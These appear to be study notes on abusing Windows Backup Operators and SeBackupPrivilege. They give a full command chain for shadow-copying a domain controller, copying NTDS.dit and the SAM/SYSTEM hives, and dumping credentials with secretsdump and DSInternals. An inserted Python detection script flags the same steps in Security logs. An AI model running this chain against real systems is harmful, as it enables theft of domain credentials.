8. Windows Built-in Groups

Approach to Exploiting Windows Built-in Groups (Focus: Backup Operators)

Identify Group Memberships:

whoami /groups  # Check if the user is in "Backup Operators"

Verify SeBackupPrivilege:

whoami /priv  # Check if SeBackupPrivilege is present (it may show as Disabled until enabled)
Get-SeBackupPrivilege  # PowerShell cmdlet from SeBackupPrivilegeCmdLets.dll; import the modules below first

Enable SeBackupPrivilege (if needed):

Set-SeBackupPrivilege  # PowerShell cmdlet from SeBackupPrivilegeCmdLets.dll; enables the privilege in the current token

Import SeBackupPrivilege Modules:

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Access Protected Files:

dir <protected_directory>  # Verify lack of access
Copy-FileSeBackupPrivilege <protected_file> <destination>
robocopy /B <source> <destination> <file>

Target Domain Controller (NTDS.dit):

diskshadow.exe  # Create shadow copy; the lines below are entered at the DISKSHADOW> prompt (or saved to a script and run with diskshadow.exe /s <script>)
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
exit
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit <destination>
robocopy /B E:\Windows\NTDS\ <destination> ntds.dit

Backup Registry Hives:

reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV

Extract Credentials (NTDS.dit):

Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\SYSTEM.SAV  # SYSTEM hive saved with reg save above
Get-ADDBAccount -DistinguishedName <DN> -DBPath .\ntds.dit -BootKey $key
secretsdump.py -ntds ntds.dit -system SYSTEM.SAV LOCAL  # offline mode; LOCAL needs no credentials
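The chain above leaves a recognisable trail in the Security log: event 4672 (special privileges assigned to a new logon) lists SeBackupPrivilege for the session, and event 4688 (process creation, with command-line auditing enabled) records diskshadow, robocopy /B and reg save of the SAM/SYSTEM hives under the same SubjectLogonId. The following detection is an added example and not part of the original notes; the event records are constructed, and the field names follow the Security log schema.

```python
"""Flag backup-privileged logons that run the NTDS/hive extraction steps above."""
import re

ALWAYS_FLAG = {"diskshadow.exe"}                  # any use under a backup token
FLAG_IF = {                                       # exe -> suspicious argument pattern
    "robocopy.exe": re.compile(r"\s/b\b", re.I),  # backup-mode copy bypasses ACLs
    "reg.exe": re.compile(r"\bsave\s+hklm\\(sam|system|security)\b", re.I),
}
SENSITIVE_PATH = re.compile(r"ntds\.dit|\\(sam|system)(\.sav)?\b", re.I)

SAMPLE_EVENTS = [  # constructed sample records, not real log data
    {"EventID": 4672, "SubjectLogonId": "0x5a1b2", "SubjectUserName": "bkpop",
     "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege"},
    {"EventID": 4688, "SubjectLogonId": "0x5a1b2",
     "NewProcessName": r"C:\Windows\System32\whoami.exe", "CommandLine": "whoami /priv"},
    {"EventID": 4688, "SubjectLogonId": "0x5a1b2",
     "NewProcessName": r"C:\Windows\System32\diskshadow.exe", "CommandLine": "diskshadow.exe"},
    {"EventID": 4688, "SubjectLogonId": "0x5a1b2",
     "NewProcessName": r"C:\Windows\System32\Robocopy.exe",
     "CommandLine": r"robocopy /B E:\Windows\NTDS\ C:\Windows\Temp ntds.dit"},
    {"EventID": 4688, "SubjectLogonId": "0x5a1b2",
     "NewProcessName": r"C:\Windows\System32\reg.exe", "CommandLine": r"reg save HKLM\SYSTEM SYSTEM.SAV"},
    {"EventID": 4688, "SubjectLogonId": "0x7c3d",  # ordinary user: no 4672 with SeBackupPrivilege
     "NewProcessName": r"C:\Windows\System32\robocopy.exe", "CommandLine": r"robocopy D:\data E:\backup /E"},
]


def detect_backup_privilege_abuse(events):
    """Return (logon_id, exe, command_line) for each flagged process creation."""
    # Step 1: logon sessions whose 4672 event granted SeBackupPrivilege.
    backup_logons = {
        e["SubjectLogonId"] for e in events
        if e["EventID"] == 4672 and "SeBackupPrivilege" in e["PrivilegeList"].split()
    }
    # Step 2: process creations in those sessions matching the extraction tooling.
    alerts = []
    for e in events:
        if e["EventID"] != 4688 or e["SubjectLogonId"] not in backup_logons:
            continue
        exe = e["NewProcessName"].rsplit("\\", 1)[-1].lower()
        cmd = e.get("CommandLine", "")
        pattern = FLAG_IF.get(exe)
        if exe in ALWAYS_FLAG or (pattern and pattern.search(cmd)) or SENSITIVE_PATH.search(cmd):
            alerts.append((e["SubjectLogonId"], exe, cmd))
    return alerts


if __name__ == "__main__":
    for logon, exe, cmd in detect_backup_privilege_abuse(SAMPLE_EVENTS):
        print(f"[ALERT] logon {logon}: {exe} -> {cmd}")
```

Without command-line auditing the 4688 CommandLine field is empty, so only the diskshadow.exe match survives; the 4672 correlation is what keeps ordinary robocopy backups from firing.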

Commands:

whoami /groups
whoami /priv
diskshadow.exe
reg save
secretsdump.py
robocopy /B
dir

PowerShell Cmdlets:

Get-SeBackupPrivilege
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege
Import-Module .\DSInternals.psd1
Get-BootKey
Get-ADDBAccount
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Tools:

  • diskshadow.exe (Windows built-in)
  • reg.exe (Windows built-in)
  • secretsdump.py (Impacket)
  • robocopy.exe (Windows built-in)
  • DSInternals (PowerShell module)
  • SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll (custom PowerShell modules)

Techniques:

  • Leverage SeBackupPrivilege to bypass file ACLs.
  • Use diskshadow to create shadow copies of locked files.
  • Extract credentials from NTDS.dit and registry hives.
  • Use robocopy as an alternative to custom scripts.
